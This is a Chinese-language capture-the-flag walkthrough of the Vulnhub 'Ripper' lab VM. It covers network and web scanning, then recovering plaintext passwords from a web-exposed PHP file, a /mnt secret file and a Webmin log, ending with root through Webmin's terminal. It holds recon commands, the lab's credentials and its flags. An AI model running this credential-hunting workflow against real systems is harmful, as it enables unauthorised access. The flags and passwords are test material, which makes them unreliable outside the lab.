Ripper
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.173.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:81:10:a5 2 120 PCS Systemtechnik GmbH
192.168.56.224 08:00:27:72:76:55 2 120 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.224
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 20:34 EST
Nmap scan report for bogon (192.168.56.224)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:1a:06:6e:ed:a0:9b:6f:d7:c7:78:83:3a:f7:7a:9c (RSA)
| 256 99:f1:83:7c:15:b9:db:a7:a8:56:96:05:ae:5d:d3:ee (ECDSA)
|_ 256 f4:8c:5a:90:99:ea:d6:24:ba:5a:2d:13:e9:ce:68:0c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:72:76:55 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.94 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、10000(HTTP)
获得Shell
浏览器访问80端口,返回apache2默认页面,检查robots.txt文件,不存在。接下来做一下目录扫描:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 20:41:33 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220336 / 220561 (99.90%)===============================================================
2022/12/15 20:41:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ nikto -h http://192.168.56.224
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.224
+ Target Hostname: 192.168.56.224
+ Target Port: 80
+ Start Time: 2022-12-15 22:29:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c3f2156d5d01, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-15 22:30:03 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ dirb http://192.168.56.224
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 15 22:30:55 2022
URL_BASE: http://192.168.56.224/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.224/ ----
+ http://192.168.56.224/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.224/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Thu Dec 15 22:30:57 2022
DOWNLOADED: 4612 - FOUND: 2
Gobuster工具以及nikto、dirb都没有扫描出任何新的目录,看用gobuster工具扫描一下文件:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,sh,html
[+] Timeout: 10s
===============================================================
2022/12/15 22:32:22 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10918]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101024 / 1102805 (99.84%)===============================================================
2022/12/15 22:34:56 Finished
===============================================================
gobuster工具也没有扫描出文件,接下来看一下端口:10000
访问10000端口,返回页面中说明:会转向Https,并且有主机名,所以先增加主机记录:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.224 ripper-min
访问url:
https://ripper-min:10000/
返回用户登录页面。
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ curl -k https://ripper-min:10000/robots.txt
User-agent: *
Disallow: /
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ echo 'd2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==' | base64 -d
we scan php codes with rips
访问rips官网,在其下载与安装部分,我们发现安装完成后,他的路径就是/rips/,我们尝试在80和10000端口访问此目录,找到80端口下存在rips服务
rips页面中可以扫描/var/www下目录的文件是否有漏洞,结果表明有4个文件有漏洞(信息泄露)
其中有个文件./html/rips/secret.php有用户名密码信息:
username: ripper
password:Gamespeopleplay
用该用户名尝试登录10000端口,但是失败,那会不会是ssh用户密码:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ ssh [email protected]
The authenticity of host '192.168.56.224 (192.168.56.224)' can't be established.
ED25519 key fingerprint is SHA256:Gz/RqLZwvom5GaG8tBiFtAT9fnNDcbSol7p6Fnfe0G0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.224' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
276 packages can be updated.
211 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Jun 4 13:26:34 2021 from 10.0.0.154
ripper@ripper-min:~$ id
uid=1000(ripper) gid=1000(ripper) groups=1000(ripper),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ripper@ripper-min:~$
ripper@ripper-min:~$ cat flag.txt
__________.____________________________________________
\______ \ \______ \______ \_ _____/\______ \
| _/ || ___/| ___/| __)_ | _/
| | \ || | | | | \ | | \
|____|_ /___||____| |____| /_______ / |____|_ /
\/ \/ \/
flag{15ea80f080be3714df1ef97bac5d7151}
C0ngratulation on getting user ! Lets get root now :)
ripper@ripper-min:~$
提权
由于作者提示需要拿到所有用户的shell,然后提权到root
ripper@ripper-min:/tmp$ cd /home
ripper@ripper-min:/home$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Jun 4 2021 .
drwxr-xr-x 24 root root 4.0K Jun 4 2021 ..
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 cubes
drwxr-xr-x 16 ripper ripper 4.0K Jun 4 2021 ripper
ripper@ripper-min:/home$
也就是说接下来设法拿到cubes的shell
ripper@ripper-min:/home$ cd cubes/
ripper@ripper-min:/home/cubes$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 .
drwxr-xr-x 4 root root 4.0K Jun 4 2021 ..
-rw------- 1 cubes cubes 384 Jun 4 2021 .bash_history
-rw-r--r-- 1 cubes cubes 220 Jun 4 2021 .bash_logout
-rw-r--r-- 1 cubes cubes 3.7K Jun 4 2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun 4 2021 .cache
drwx------ 11 cubes cubes 4.0K Jun 4 2021 .config
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Desktop
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Documents
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Downloads
-rw-r--r-- 1 cubes cubes 8.8K Jun 4 2021 examples.desktop
drwx------ 3 cubes cubes 4.0K Jun 4 2021 .gnupg
-rw------- 1 cubes cubes 334 Jun 4 2021 .ICEauthority
drwxrwxr-x 3 cubes cubes 4.0K Jun 4 2021 .local
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Music
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Pictures
-rw-r--r-- 1 cubes cubes 807 Jun 4 2021 .profile
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Public
drwx------ 2 cubes cubes 4.0K Jun 4 2021 .ssh
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Templates
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Videos
ripper@ripper-min:/home/cubes$ cd .ssh
-bash: cd: .ssh: Permission denied
ripper@ripper-min:/home/cubes$ cat .bash_history
cat: .bash_history: Permission denied
cubes的家目录没有权限查看,可用Find命令查看cubes用户相关的文件:
ripper@ripper-min:/home/cubes$ find / -user cubes -type f 2>/dev/null
/home/cubes/.profile
/home/cubes/.bashrc
/home/cubes/.ICEauthority
/home/cubes/examples.desktop
/home/cubes/.bash_logout
/home/cubes/.bash_history
/mnt/secret.file
ripper@ripper-min:/home/cubes$ ls -alh /mnt/secret.file
-rw-rw-r-- 1 cubes cubes 60 Jun 4 2021 /mnt/secret.file
ripper@ripper-min:/home/cubes$ cat /mnt/secret.file
This is my secret file
[file system]
-passwd : Il00tpeople
ripper@ripper-min:/home/cubes$
ripper@ripper-min:/home/cubes$ su - cubes
Password:
cubes@ripper-min:~$ id
uid=1001(cubes) gid=1001(cubes) groups=1001(cubes)
cubes@ripper-min:~$ sudo -l
[sudo] password for cubes:
Sorry, user cubes may not run sudo on ripper-min.
cubes@ripper-min:~$ cd /home/cubes/
cubes@ripper-min:~$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 .
drwxr-xr-x 4 root root 4.0K Jun 4 2021 ..
-rw------- 1 cubes cubes 384 Jun 4 2021 .bash_history
-rw-r--r-- 1 cubes cubes 220 Jun 4 2021 .bash_logout
-rw-r--r-- 1 cubes cubes 3.7K Jun 4 2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun 4 2021 .cache
drwx------ 11 cubes cubes 4.0K Jun 4 2021 .config
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Desktop
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Documents
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Downloads
-rw-r--r-- 1 cubes cubes 8.8K Jun 4 2021 examples.desktop
drwx------ 3 cubes cubes 4.0K Jun 4 2021 .gnupg
-rw------- 1 cubes cubes 334 Jun 4 2021 .ICEauthority
drwxrwxr-x 3 cubes cubes 4.0K Jun 4 2021 .local
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Music
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Pictures
-rw-r--r-- 1 cubes cubes 807 Jun 4 2021 .profile
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Public
drwx------ 2 cubes cubes 4.0K Jun 4 2021 .ssh
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Templates
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Videos
cubes@ripper-min:~$
cubes@ripper-min:~$ cat .bash_history
cd /var/
ls
cd webmin/
ks
ls
cd backup/
ls
cd /mnt/
ls -la
nano s.txt
ls
rm s.txt
nano secret.file
su ripper
sudo apt
su root
cd /var/
ls
cd webmin/
ls
mkdir backup
cd backup/
cd ..
ls
cat miniserv.
cat miniserv.log
cd modules/
ls
cd ..
ls
cat miniserv.error
ls
cat blocked
cp miniserv.error backup/miniser.log
cd backup/
ls
nano miniser.log
cd /mnt/
ls
nano secret.file
su root
cubes@ripper-min:~$
到/var/webadmin目录下看一看:
cubes@ripper-min:/var/webmin$ cd backup
cubes@ripper-min:/var/webmin/backup$ ls -alh
total 12K
drwxrwxr-x+ 2 cubes cubes 4.0K Jun 4 2021 .
drwxrwx---+ 4 root bin 4.0K Jun 4 2021 ..
-rw-rwx---+ 1 cubes cubes 2.6K Jun 4 2021 miniser.log
cubes@ripper-min:/var/webmin/backup$ cat miniser.log
[04/Jun/2021:11:21:48 -0400] miniserv.pl started
[04/Jun/2021:11:21:48 -0400] IPv6 support enabled
[04/Jun/2021:11:21:48 -0400] Using MD5 module Digest::MD5
[04/Jun/2021:11:21:48 -0400] Using SHA512 module Crypt::SHA
[04/Jun/2021:11:21:48 -0400] Perl module Authen::PAM needed for PAM is not installed : Can't locate Authen/PAM.pm in @INC (you may need to install the Authen::PAM module) (@INC contains: /root/webmin-1.910 /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at (eval 15) line 1.
BEGIN failed--compilation aborted at (eval 15) line 1.
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : session_login.cgi=username=admin&pass=tokiohotel
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:29 -0400] Reloading configuration
[04/Jun/2021:11:33:39 -0400] Reloading configuration
Use of uninitialized value in numeric ne (!=) at /root/webmin-1.910/bind8/bind8-lib.pl line 2397.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
cubes@ripper-min:/var/webmin/backup$
在miniser.log中看到了用户名和密码,可能是webmin的:
成功登录管理后台,并且有个web terminal终端功能,直接就拿到了root flag
[admin@ripper-min ~]# id
uid=0(root) gid=0(root) groups=0(root)
[admin@ripper-min root]# ls -alh
total 30M
drwx------ 7 root root 4.0K Jun 4 2021 .
drwxr-xr-x 24 root root 4.0K Jun 4 2021 ..
-rw------- 1 root root 1.5K Jun 4 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Aug 6 2020 .cache
drwx------ 3 root root 4.0K Dec 15 23:41 .gnupg
drwxr-xr-x 3 root root 4.0K Jun 4 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 170 Jun 4 2021 .wget-hsts
-rw-r--r-- 1 root root 252 Jun 4 2021 flag.txt
drwxr-xr-x 6 root root 4.0K Jun 4 2021 snap
drwxr-xr-x 132 root bin 12K Jun 4 2021 webmin-1.910
-rw-r--r-- 1 root root 30M May 9 2019 webmin.tar.gz
[admin@ripper-min root]# cat flag.txt
.---..-.-.-..-..-..--. .---. .-..---..---..---..---.
| |-'| | | || .` || \ \### | |-< | || |-'| |-'| |- | |-<
`-' `-----'`-'`-'`-'-' `-'`-'`-'`-' `-' `---'`-'`-'
COngrats !!! You have rooted this box !!
Follow me on twitter @san3ncrypt3d
[admin@ripper-min root]#